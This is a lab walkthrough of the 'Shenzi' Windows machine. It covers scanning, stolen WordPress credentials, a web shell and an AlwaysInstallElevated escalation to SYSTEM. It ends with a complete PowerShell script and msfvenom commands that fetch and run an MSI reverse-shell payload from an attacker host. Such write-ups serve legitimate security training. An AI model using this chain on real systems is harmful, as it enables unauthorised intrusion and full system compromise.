Shenzi
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 4000 -Pn 192.168.201.55
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 13:46 +08
Nmap scan report for 192.168.201.55
Host is up (0.18s latency).
Not shown: 65520 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5040/tcp open unknown
7680/tcp open pando-pub
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
Lots of ports here. FTP doesn't allow anonymous access.
SMB Access -> WP Creds
smbmap shows that there are a few shares we can access:
The share had a few interesting files:
passwords.txt contained credentials for a WordPress instance, while the rest of the files were rather uninteresting:
Web Enumeration -> WP RCE
Port 80 shows the default XAMPP page:

There was a phpinfo page linked from the dashboard that we could view for more clues.

The only interesting thing to note is that the local user on the machine is named shenzi. We still need to find the WordPress instance those credentials belong to, but all directory scans failed to find any trace of wp-content or wp-admin.
I was stuck here for a while, until I tried /shenzi (the username from phpinfo) as a directory, and the WordPress instance was there!

With these credentials, we can log in to the admin panel and replace one of the theme's PHP files with a web shell.

Then, we can upgrade to a reverse shell by downloading nc.exe onto the machine through the web shell and executing it:

Privilege Escalation
AlwaysInstallElevated -> SYSTEM
I ran winPEAS.exe to enumerate the machine for me. It picked up on AlwaysInstallElevated being misconfigured: when the Installer policy key in both HKLM and HKCU sets AlwaysInstallElevated to 1, any user can have the Windows Installer service install an MSI package with SYSTEM privileges:

Using this, we can generate an MSI payload with msfvenom that spawns a reverse shell back to our listener.
Afterwards, transfer the file over to the machine and run it with msiexec:
Because the installer runs with SYSTEM privileges, this gives us a reverse shell as the SYSTEM user on our listener:
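The steps above, collected into one PowerShell script that would be run from the low-privilege shenzi shell. This is an added example and is not code from the original writeup: it re-checks the two registry values winPEAS flagged (the technique only works if both are 1), pulls the MSI from the attacker box and hands it to msiexec. The attacker address 192.168.45.200, listener port 4444 and the file name shell.msi are hypothetical; the msfvenom command in the comments is the assumed way the package was built.

```powershell
# Added example, not part of the original writeup.
# Attacker side (assumed, run beforehand):
#   msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.200 LPORT=4444 -f msi -o shell.msi
#   python3 -m http.server 80      (serves shell.msi)
#   nc -nlvp 4444                  (catches the SYSTEM shell)

function Test-AlwaysInstallElevated {
    # Both the machine-wide (HKLM) and per-user (HKCU) policy values must be 1.
    # If either is missing or 0, msiexec installs with the caller's privileges
    # and the MSI payload would only give a shell as the current user.
    $paths = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )
    $results = foreach ($p in $paths) {
        $v = (Get-ItemProperty -Path $p -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Hive = $p.Split(':')[0]; AlwaysInstallElevated = $v }
    }
    $results | Format-Table -AutoSize | Out-String | Write-Host
    return (@($results | Where-Object { $_.AlwaysInstallElevated -eq 1 }).Count -eq 2)
}

# Hypothetical attacker host and drop location on the target.
$attacker = 'http://192.168.45.200/shell.msi'
$msi      = 'C:\Users\shenzi\AppData\Local\Temp\shell.msi'

if (-not (Test-AlwaysInstallElevated)) {
    Write-Host 'AlwaysInstallElevated is not fully enabled; this vector will not escalate.'
    return
}

# Transfer the package to the target.
Invoke-WebRequest -Uri $attacker -OutFile $msi

# /quiet and /qn suppress the installer UI; /i installs the package.
# The Windows Installer service performs the install as SYSTEM, so the
# embedded payload connects back to the listener with SYSTEM privileges.
# (msfvenom MSIs are built to fail the install after launching the payload,
# so the "installation failed" message afterwards is expected.)
Start-Process -FilePath 'msiexec.exe' -ArgumentList '/quiet', '/qn', '/i', $msi
```

The explicit check before installing matters in practice: winPEAS reports the setting, but on some hosts only one of the two values is present, and then the whole chain silently produces an unprivileged shell.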
